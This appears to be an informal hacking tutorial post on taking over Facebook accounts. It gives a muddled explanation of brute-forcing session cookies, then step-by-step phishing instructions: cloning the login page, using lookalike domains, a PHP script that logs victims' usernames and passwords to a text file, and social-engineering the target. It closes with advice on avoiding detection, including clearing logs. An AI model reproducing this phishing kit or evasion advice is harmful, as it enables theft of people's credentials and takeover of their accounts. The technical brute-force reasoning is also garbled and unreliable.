Okay there’s 2 ways of hacking a facebook account…
I’m not going to go into detail on how to do any of this and you’ll see why!
Brute Force Method:
You’re going to need to stream 160 bits of data via php cookie. Broken down that would be:
IP Address of the person whos facebook you’re hacking : 32 bits
epoch = January 1, 1970: 32 bits
microseconds that the client first recieved their cookie: 32 bits
Finally a random value that is generated: 64 bits
32 bits
32 bits
32 bits
64 bits
160 bits
But streaming that much data would take up to about 5,000,000 years
So to accomplish this goal you would have to hash out this data in md5 or sha1, reducing it by 8 bytes and stream it in separate cookies.
You would have to aquire all of this information though.
For example:
the last 64 bits of the entropy is
s1
X=the time the server started
y=the exact miliseconds the server started
x(y)=s1
s2
w=process id of linux
z=random 20 bits generated
wz=s2
Now we take
s1+s2=64 bits
So once you have that 64 bits you still have another 96 bits to aquire.
So you can come up with your own cheeky method to aquire the IP Address, 32 bits.
Now you need 64 bits which are the the epoch and the microseconds that the user first got their cookie
To get the microsecond the user required their cookie can be done through the chat, which uses ajax to see whether or not that the user is online. Using a packet sniffer to retrieve that data you now have that time… Hooray! Convert that to epoch, 1 January 1970 00:00:00.
Now you have the 32 bits left epoch 1 January 1970 00:00:00 which was already given.
Once all of this information is hashed, you will be reduced down to 20 bits. As I said you will have to stream all of that data in separate cookies to avoid spending your after life still Brute Forcing the victims facebook. So that will be 1,048,576 cookies and can be done in 500,000 requests which shouldn’t take that long depending on the speed of your internet.
Second method…
Phishing Method
You take the source code of the facebook login page, save all of the images, and save it in a text editor as index.html. Find a free webhost to upload it to, sign up, name your site to something inconspicuous, and upload.
You should save the site as something like faccebook.com or facebook.com or facebok.com or even facobook.com.
Just so it looks actually like facebook. So since you’ll probably not invest in a premium webhosting account
They’ll take your site faccebook.com and name it something like faccebook.w3bh0st.com.
Now go into the html document and search for action until you come around this tag
where action= in quotes type the name of your php file we’ll talk about below.
for example
output.php
The file can be named anything but it has to have the .php extension at the end.
The script should look something like this
header (‘Location: www.facebook.com"’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
This is not my script but someone elses script since this is the most popular method of facebook account hacks.
So now you will send your fake facebook form url to the victim. Once they recieve it make sure to come up, using your social engineering abilities, something clever to con them into typing their username and password into the login form. Once they hit login, that is the action=“output.php” part, php will work it’s magic to outputing a text file called usernames.txt containing the login credentials you will then use to obtain access to the facebook account. Now that you’ve aquired that information login, viola!
IMPORTANT PART!!!!!
BUT! there’s a catch… You need to understand what all of this means. This is just an example of stuff you will come accross in time with your hacking experience.
Hacking: Unconventional ways of accessing information -Eli the Computer Guy
I’m going to give you some hacking homework :) :
Look up and study these Terms:
-programming
-markup languages
-high level programming languages
-low level programming languages
-Assembly
-html
-php
-javascript
-ajax
-jquery
-Libraries
-Framework (Better than Software)
-Software
-server side scripting
-graphical user interface (GUI)
-line user interface (LUI)
-networking
-password hashing
-Internet Protocol Address (IP Address)
-External IP Address
-Internal IP Address
-Transmission Control Protocol (TCP)
-User Datagram Protocol (UDP)
-Hypertext Transfer Protocol (HTTP)
-Hypertext Transfer Protocol Secure (HTTPS)
-File Transfer Protocol (FTP)
-Simple Mail Transfer Protocol (SMTP)
-Telnet
-Secure Shell (SSH)
-Operating System
-RAM
-CPU
-Storage Space
-Network Sharing
-Backdoors
-Virus
-Firewall
-Ports
-File extenstions
-Port Scanning
-Proxy Servers
-Virtual Private Networks
-Bots
-Phishing
-Cookies
-Web Browser
-Worms
-Trojans
-Keyloggers
Once you’ve done that and have plenty of research done on and a good understanding what these terms mean, get familiar with using Line User Interfaces opposed to Graphical User Interface. Learn the commands that are within the systems, what they do, how they work, and what arguments come with them. Once you have a fair understanding of all of this information you should be able to start messing with your own things and coming up with custom attacks.
Note: It’s good to inspect and view others code but never copy, because you’ll never learn that way. That term is called kiddie scripting.
If not already, get familiar with Linux Operating Systems. There’s many of them and they are all free and open sourced unlike other operating systems. Note that every operating system is good for their own use.
Some good popular Linux distributions designed for hackers are:
-Backtrack
-Kali Linux
-BugTraq
-Matriux Krypton
-Red Hat
Keep up to date with all software, operating systems, and security vulnerabilities.
Once this all comes hand in hand learn html, css, and some programming languages.
Languages essential and good to start with:
-python (need libraries)
-php
-vbs (only for microsoft windows)
-javascript
You can learn some languages at codeacademy.com and w3schools like Night3Shad said and yes, Google is your friend.
Learn Binary and Hexadecimal for sure and how basic computing works. 8 bits = a byte that kind of stuff y ‘know.
Be Safe
Be Secure
Never use your own personal information
Never use your email accounts
Never use your own Network
Be Creative
Think outside of the box
Inspect code
Look for vulnerabilities
Clear your logs
Have Fun!
Here’s a little push and good resources:
Eli the Computer Guy
http://www.youtube.com/user/elithecomputerguy
This his Hacking Course Playlist here:
&list=PLB250111087E58F76
Skidhacker
http://www.youtube.com/user/joshv06
If you want to read more about that first attack I showed you, it was not developed by me, here you go: http://software.intel.com/sites/default/files/m/d/c/1/BlackHat-USA-2010-Kamkar-How-I-Met-Your-Girlfriend-wp.pdf
Happy Hacking, Have Fun…..
Cheers!
